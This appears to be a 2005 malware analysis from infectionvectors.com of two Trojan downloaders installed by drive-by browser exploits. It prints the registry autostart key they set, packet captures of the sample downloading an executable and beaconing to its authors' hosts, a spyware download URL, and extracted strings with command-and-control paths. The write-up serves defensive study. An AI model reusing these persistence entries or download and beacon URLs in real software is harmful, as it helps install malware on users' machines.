know the business. spot the spies. deflect
the attack.
|
|
|
|
Free Samples: A Trojan on the Job Download PDF infectionvectors.com March 2005
Overview
Trojan horse delivery has seen tremendous improvements over the last few years. At one point there was a need for users to seek out, download, and execute applications to infect their local machines. The applications were modified to include additional (nefarious) functionality that often allowed an attacker to control the victim computer, mine specific data from the box, or automatically download additional code. Recently, the trend for delivering Trojans has been via web exploits, employing active scripting to force code onto a machine without requiring that a user click on anything other than a web link. In many cases, the web site being visited can be completely free from external modification, the attack can come through the banner ads piped to the site from an outside provider (whether the site in question is still liable for such attacks is a debate that has yet to be settled).
Trojans are not a new classification of malware. One characteristic of many modern Trojans is the clear profit motive behind them, they are often "sponsored" by organizations that generate revenue by delivering ads to users (or more appropriately, delivering users to advertisers). Although the terms "spyware" and "adware" are often used to describe this type of Trojan, the only distinction in the software is this obvious profit-motive. The same, however, can be seen in many other types of malware, such as the mass mailers Sobig and Beagle - both with clear spamming interests at their hearts. These revenue-generating worms are still mass mailing worms, not "adware."
Hitchhikers on the Superhighway
This section looks at a pair of companion Trojans that attempt to install additional software, open backdoors for pop-ups, and lower the security settings on the victim machines browser. They may be flagged by certain antivirus products (although not all have signatures for the example pieces of malware), there is no standard name for these applications. Most will recognize the basic traits of these programs and place them in the generic category of Trojan.Downloader, Dloader, or Agent.Downloader.
The first application was picked up via simple web browsing, the so-called hit and run delivery that has become common for Internet Explorer users. Using browser flaws such as the IFRAME overrun, these pieces of code install themselves through web pages carrying their code (known or unknown to the web site owner) and banner advertisements carried by ad providers to all corners of the Internet. The downloaders in question are capable of installing themselves (hiding their true nature by using names of Windows system files) without user acceptance, establishing an autostart hook in the Registry (see references for more details), and retrieving additional programs from the web. Often these additional applications are also identified as malware by ant virus scanners. There seems to be little room left to argue that these types of programs are legitimate software.
One sample obtained in March of 2005 exhibits all of the characteristics mentioned above. Although these pieces of malware change rapidly to allow for changes in Trojan locations and to avoid detection, many can be grouped into families; the sample discussed here has relatives catalogued as Dloader on Sophos site. For purposes of this study, it is simply referred t as Downloader1.
Downloader1 is packed with UPX version 1.25, which was released in the summer of 2004. The file downloaded by the sample examined by infectionvectors.com was packed with UPX version 1.93, released as a beta in February of 2005 - indicating that the author is updating the companion files. Repacking the applications is also likely in an effort to avoid detection (especially considering the author used a compression tool in its beta stage), the same tactic employed by more traditional virus/malware writers.
When the application is executed, by a user or script, it creates a copy of itself with the name "services.exe" in a new directory named "MSOffice," which the malware creates in the Windows folder. It then sets the following key to ensure that the application starts up with each restart:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run MSOffice "C:\WINDOWS\SYSTEM\MSOffice\services.exe"
Within seconds, the Trojan then begins to retrieve additional code from the Internet. In fact, it checks the web regularly for updated software. It is coded to retrieve a program named "gamma.exe" and save it in the Windows directory with a random string of letters. It is called Downloader2 here. The associated network traffic is shown here (from Ethereal capture):
GET /gamma.exe HTTP/1.1 User-Agent: Windows Internet Host: www.newiframe.biz Connection: Keep-Alive Cache-Control: no-cache
HTTP/1.1 200 OK Date: Thu, 24 Mar 2005 23:19:29 GMT Server: Apache/1.3.31 (Unix) PHP/4.3.8 Last-Modified: Sat, 18 Dec 2004 17:25:01 GMT ETag: "feb9c7-7a00-41c467ed" Accept-Ranges: bytes Content-Length: 31232 Connection: close Content-Type: application/octet-stream
MZ
˙˙ ¸ @ŕ
´ Í!¸LÍ!This
program cannot be run in DOS mode.
[Binary retrieval truncated here.]
Downloader2 carries with it retrieval strings for numerous pieces of software, some of which did not exist at the time of this writing. One piece of code that this Trojan does reach out for includes the IST toolbar, by way of a website often maligned in the abuse groups on the web (URL intentionally made unclickable, follow at own risk):
http:// www.slotch. com/ist/softwares /v4.0/ istdownload.exe
The IST application is identified as spyware by McAfee's malware removal product. However, the McAfee site clearly states that much of the software found on PCs is their because a user accepted a usage agreement from IST (to read some of the McAfee warnings see http://vil.nai.com/vil/content/v_116303.htm). The application is grabbed by:
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&retry=2& loadfirst=1&account_id=137837&delayload=0&adid=a1103101224
Another tactic often employed malware authors is seen below. This spyware application registers the infected machine with a server controlled by its authors (again, from Ethereal capture):
GET /xpsystem/report.php?user_id=0&status=0&country_id=1 HTTP/1.1 User-Agent: Windows Internet Host: sp2admin.biz Connection: Keep-Alive Cache-Control: no-cache
HTTP/1.1 200 OK Date: Thu, 24 Mar 2005 23:19:31 GMT Server: Apache/1.3.31 (Unix) PHP/4.3.8 X-Powered-By: PHP/4.3.8 Connection: close Transfer-Encoding: chunked Content-Type: text/html
5 false 0
The Door is Always Open
Within just a few minutes, the victim machine can be overrun with Trojans, all seeking to display unwanted advertisements and deliver even more software to the infected machine. Many of the applications in this family lower the established security settings on the machine allowing unwanted applications from anywhere to enter the box (see CAs discussion of Win32/Chopenez). These tactics include allowing for browser helper objects, adding sites to the Trusted Zone, and redirecting the browser to sites the user may normally avoid because of security concerns.
The Trojans discussed here are but a few specks in the pile of malware that now confronts Internet users at every turn. These types of applications play a large role in making the Internet less attractive to the general user, chipping away at the consumer base that e-commerce requires to flourish.
Unpacking of Downloader1:
C:\Malware\MSOffice>upx -d services.exe Ultimate Packer for eXecutables Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004 UPX 1.25w Markus F.X.J. Oberhumer & Laszlo Molnar Jun 29th 2004
File size Ratio Format Name -------------------- ------ ----------- ----------- 65536 <- 31744 48.44% win32/pe services.exe
Unpacked 1 file.
Unpacking of Downloader2:
C:\Malware>upx -d bmnxmyhl.exe Ultimate Packer for eXecutables Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005 UPX 1.93 beta Markus F.X.J. Oberhumer & Laszlo Molnar Feb 7th 2005
File size Ratio Format Name -------------------- ------ ----------- ----------- 61440 <- 31232 50.83% win32/pe bmnxmyhl.exe
Unpacked 1 file.
Downloader1: sample strings output:
0000D040 sp2admin.biz 0000D050 Uninstall Flag 0000D060 Terminate Flag 0000D074 Windows Internet 0000D090 explorer.exe 0000D0A8 Applications\iexplore.exe\shell\edit\command 0000D0DC Applications\iexplore.exe\shell\open\command 0000D10C SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE 0000D150 %u %u %[ 0000D159 0 , ] %[ 0000D160 0 , ] %[ 0000D170 Last Command 0000D180 Software\Microsoft\Internet Explorer\Main 0000D1AC http://%s/xpsystem/commands.ini 0000D1CF , ] %u %[ 0000D1D9 , ] %[ 0000D1E0 , ] %[ 0000D1EC http://%s/xpsystem/crontab.ini 0000D20C kakogo_cherta_tebe_zdes_nado 0000D22C http://%s/xpsystem/report.php?user_id=%u&status= %u&country_id=%s 0000D270 SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0000D2A0 MSOffice 0000D2B0 user_id=%u 0000D2BC services.exe 0000D2CC \MSOffice\ 0000D2DC \MSOffice\services.exe 0000D2F4 http://www.newiframe.biz/gamma.exe
Downloader2 contains the following snippet of references to ad-sponsored Trojans, familiar to most spyware/adware researchers:
0000C308 0040C308 0 updatestats 0000C31C 0040C31C 0 Internet Optimizer 0000C330 0040C330 0 DyFuCA Active Alerts 0000C348 0040C348 0 DyFuCA 0000C350 0040C350 0 safesurfingupdate 0000C364 0040C364 0 MS Updates 0000C370 0040C370 0 WebRebates0 0000C37C 0040C37C 0 Power Scan 0000C390 0040C390 0 IST Service 0000C39C 0040C39C 0 BullsEye Network 0000C3B8 0040C3B8 0 ixizgfcp 0000C3C4 0040C3C4 0 VGroup 0000C3CC 0040C3CC 0 MaxSpeed 0000C3EC 0040C3EC 0 Vendor 0000C3F4 0040C3F4 0 keenvalue 0000C400 0040C400 0 incredifind 0000C410 0040C410 0 updmgr 0000C418 0040C418 0 perfectnav 0000C424 0040C424 0 euniverse 0000C430 0040C430 0 180ax 0000C440 0040C440 0 bargain buddy 0000C450 0040C450 0 CashBack 0000C45C 0040C45C 0 safesurfing 0000C468 0040C468 0 ISTBar 0000C470 0040C470 0 ISTSvc 0000C47C 0040C47C 0 microsoft\sidefind 0000C490 0040C490 0 Voiceglo 0000C49C 0040C49C 0 IncrediFind 0000C4A8 0040C4A8 0 StatBlaster 0000C4B4 0040C4B4 0 Powerscan 0000C4C0 0040C4C0 0 YourSiteBar 0000C4CC 0040C4CC 0 WhenUSave 0000C4D8 0040C4D8 0 180Solutions 0000C4F4 0040C4F4 0 twaintec 0000C508 0040C508 0 Bargains 0000C514 0040C514 0 Avenue Media 0000C524 0040C524 0 SideFind 0000C530 0040C530 0 Lycos\SideSearch 0000C544 0040C544 0 exactutil 0000C550 0040C550 0 localnrd 0000C55C
0040C55C
0 avenue media
References
Autostart report on infectionvectors.com http://www.infectionvectors.com/vectors/startups.htm
Sophos catalogued code similar to this downloader http://www.sophos.com/virusinfo/analyses/trojdloadereu.html
CAs Chopenez Write-up http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?ID=41192
Ethereal is available at
|
Copyright Ó 2005 infectionvectors.com. All rights reserved.
